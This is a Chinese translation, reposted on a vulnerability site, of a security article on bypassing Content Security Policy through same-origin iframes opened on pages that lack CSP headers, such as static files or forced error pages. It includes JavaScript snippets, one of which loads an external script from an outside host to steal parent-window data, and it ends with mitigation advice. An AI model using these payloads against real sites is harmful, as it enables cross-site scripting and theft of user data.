CVE漏洞中文网

0DayBank一个专门收集整理全球互联网漏洞的公开发布网站
  1. 首页
  2. 漏洞列表
  3. 正文

csp

2019年2月23日 1747点热度 0人点赞 0条评论

首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
巧妙地绕过CSP:欺骗CSP执行任意代码
阅读量 85205 | 评论 6 稿费 140

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2018-07-13 13:00:34
译文声明
本文是翻译文章,文章原作者booom,文章来源:lab.wallarm.com
原文地址:https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa

译文仅供参考,具体内容表达以及含义原文为准

×

前言
内容安全策略(Content Security Policy,CSP)是一种内置的浏览器技术,有助于防止跨站点脚本(XSS)等攻击。它列出并描述了路径和源,浏览器可以从这些路径和源安全地加载资源,这些资源可能包括图像、框架、JavaScricript等。

但是,如果当所有不安全的资源来源都不被允许时,我们仍可以给出一个成功的XSS事件的例子呢?是怎么做到的呢?

当一切正常时,CSP是如何工作的
这里一个常见的使用场景是当CSP指定图片只能从当前域加载时,这意味着所有带有外部域的标记都将被忽略。

CSP策略通常用于阻止不受信任的JS和最小化XSS攻击。

下面是一个允许从本地域(self)加载和执行以下资源的示例:

Content-Security-Policy: default-src ‘self’ ‘unsafe-inline’;
由于安全策略意味着“除非明确允许,否则禁止使用”,因此配置禁止使用任何执行作为字符串传输的代码的函数。例如:eval,setTimeout,setInterval都将被阻止,因为设置了unsafe-eval

来自外部源的任何内容也会被阻止,包括图像、CSS、WebSocket,特别是JS。

要了解它是如何工作的,请查看我特意放入XSS漏洞的这段代码。尝试以这种方式窃取数据而不惊动用户,即不重定向。

欺骗CSP
尽管有这些限制,我们仍然可以上传场景、创建框架和组合图像,因为self并不妨碍使用由SOP(Self Origin Policy)管理的资源。由于CSP也适用于框架,因此相同的策略也适用于可能包含以srcdoc作为协议的数据、blob或文件的框架。

那么,我们真的可以在测试文件中执行任意的javascript吗?

我们要依靠这里的一个整洁的勾子。大多数现代浏览器都会自动将文本文件或图像等文件转换为HTML页面。

这种行为的原因是为了正确地描述浏览器窗口中的内容;它需要有正确的背景、居中等等。不过,iframe也是一个浏览器窗口!因此,在iframe中打开任何需要在浏览器中显示的文件(例如,favicon.ico or robots.txt),只要内容类型正确,就会立即将它们转换为HTML,而无需进行任何数据验证。

如果一个框架打开了一个没有CSP头的站点页面,会发生什么?你可以猜出答案。没有CSP,一个开放的框架将执行页面内的所有JS。如果页面有XSS漏洞,我们可以自己在框架中编写一个js文件。

为了测试这一点,让我们尝试一个场景,它打开了一个iframe。让我们以我们前面已经提到的Bootstrap.min.css为例。

frame=document.createElement(“iframe”);
frame.src=”/css/bootstrap.min.css”;
document.body.appendChild(frame);

让我们看看框架里有什么。正如预期的那样,CSS被转换成HTML,我们设法覆盖了Head的内容(尽管开头是空的)。现在,让我们看看是否可以让它引入外部JS文件。

script=document.createElement(‘script’);
script.src=’//bo0om.ru/csp.js’;
window.frames[0].document.head.appendChild(script);

成功了!这就是我们如何通过iframe执行注入,创建我们自己的js场景,并查询父窗口以窃取其数据。

XSS攻击只需打开一个iframe,并将其指向任何不包含CSP头的路径。它可以是标准的.ico、robots.txt、sitemap.xml、css/js、jpg或其他文件。

PoC

简单的方法
如果站点开发人员非常谨慎,并且任何预期的站点响应(200-OK)都包含X-Frame-Options: Deny怎么办?我们还可以试着进去。使用CSP的第二个常见错误是在返回Web扫描错误时缺少保护头。最简单的方法就是尝试打开一个不存在的网页。我注意到许多资源只包含200代码响应的X-Frame-Options,而没有404代码的X-Frame-Options。

如果也考虑到了这一点,我们可以尝试让站点返回一个标准的web服务器“invalid request”消息。

例如,强制Nginx返回“400 bad request”,你所需要做的就是查询/./,以防止浏览器对请求进行规范化,并将/./替换为/./,我们将对圆点和最后一个斜杠使用Unicode。

frame=document.createElement(“iframe”);
frame.src=”/%2e%2e%2f”;
document.body.appendChild(frame);

这里的另一种可能是传递和不正确的Unicode路径,即/%或/%z

然而,让Web服务器返回错误的最简单方法是超出URL允许的长度。大多数现代浏览器都可以组合一个url,这个url比web服务器所能处理的时间要长得多。由此类web服务器和nginx&apache处理的标准默认url长度设置为不超过8KB。

为此,我们可以执行路径长度为20000字节的类似场景:

frame=document.createElement(“iframe”);
frame.src=”/”+”A”.repeat(20000);
document.body.appendChild(frame);

另一种欺骗服务器返回错误的方法是触发cookie长度限制。同样,浏览器支持比web服务器能够处理的更多和更长的cookie。按照同样的设想:

创建一个巨大的cookie
for(var i=0;i<5;i++){document.cookie=i+”=”+”a”.repeat(4000)}; 使用任何地址打开iframe,这将导致服务器返回错误(通常没有XFO或CSP) 移除cookie: for(var i=0;i<5;i++){document.cookie=i+”=”} 将自己的js脚本编写到窃取父级数据的框架中 你自己试试吧。下面是一些提示,如果你需要的话:PoC:) 有许多其他方法可以导致Web服务器返回错误,例如,我们可以发送一个很长的POST请求,或者以某种方式导致Web服务器500错误。 为什么CSP如此容易受骗,该怎么办? 简单的根本原因是,控制资源的策略嵌入到资源本身中。 为了避免出现这种情况,我的建议如下: CSP报头应该出现在所有页面上。 应将CSP选项配置为仅限于使用特定资源所必需的权限。尝试设置Content-Security-Policy-Report-Only: default-src ‘none’ ,并逐步为特定用户添加权限规则。 如果必须使用不安全内联来正确加载和处理资源,则唯一的保护是使用none或散列源。否则,你将暴露在XSS攻击中,如果CSP不能保护你,为什么需要它?! 此外,正如@Majorisc所分享的那样,从页面中窃取数据的另一个技巧是使用RTCPeerConnection并通过DNS请求传递数据。不幸的是,default-src ‘self’不能防止它。 审核人:yiwang 编辑:边边 本文翻译自 lab.wallarm.com, 原文链接 。如若转载请注明出处。 Web安全 技术分析 CSP 秋真平 分享到: QQ空间 新浪微博 微信 QQ facebook twitter |推荐阅读 事件分析 | Linux watchdogs 感染性隐藏挖矿病毒入侵还原录 2019-02-23 19:55:32 WordPress 5.0 RCE 详细分析 2019-02-22 16:45:18 某php开源cms有趣的二次注入 2019-02-22 16:30:08 三层网络靶场搭建&MSF内网渗透 2019-02-22 14:30:46 |发表评论 发表你的评论吧 昵称 大表哥 换一个 |评论列表 土司观光团 · 2018-10-23 11:29:57 回复 拥有X-Frame-Options:Deny 的,用长度 绕过 会导致 写入的 的src访问出400错误,这样相当于 只能当成一个反射型xss了啊? 我不是黑客 · 2018-10-23 11:31:22 回复 网站 自动过滤 <scrip> 我不是黑客 · 2018-10-23 11:31:21 回复 网站 自动过滤 <scrip> 我不是黑客 · 2018-10-23 11:30:30 回复 两个的 中间 script src 神奇小子 · 2018-07-24 15:36:03 回复 看成scp 微笑炸弹 · 2018-07-13 14:46:55 回复 比我快一步 秋真平 这个人太懒了,签名都懒得写一个 文章 38 粉丝 4 TA的文章 Wemo Insight 智能插座缓冲区溢出漏洞及其利用分析 2018-08-29 10:00:36 如何使用 IDAPython 寻找漏洞 2018-07-18 16:30:45 对暗网黑市廉价RDP销售商店的调查 2018-07-17 15:00:35 巧妙地绕过CSP:欺骗CSP执行任意代码 2018-07-13 13:00:34 对 Smoke Loader 恶意软件新样本进行分析 2018-07-12 16:04:25 输入关键字搜索内容 相关文章 WordPress 5.0 RCE 详细分析 某php开源cms有趣的二次注入 Drupal SA-CORE-2019-003 远程命令执行分析 一篇文章带你深入理解 SQL 盲注 从两道CTF实例看python格式化字符串漏洞 Typora XSS 到 RCE(下) Typora XSS 到 RCE (上) 热门推荐 文章目录 前言 当一切正常时,CSP是如何工作的 欺骗CSP 简单的方法 为什么CSP如此容易受骗,该怎么办? 安全客Logo 安全客 安全客 关于我们 加入我们 联系我们 用户协议 商务合作 合作内容 联系方式 友情链接 内容须知 投稿须知 转载须知 合作单位 安全客 安全客 Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66 Loading...0daybank

标签: 暂无
最后更新:2019年2月23日

小助手

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

COPYRIGHT © 2024 www.pdr.cn CVE漏洞中文网. ALL RIGHTS RESERVED.

鲁ICP备2022031030号

联系邮箱:wpbgssyubnmsxxxkkk@proton.me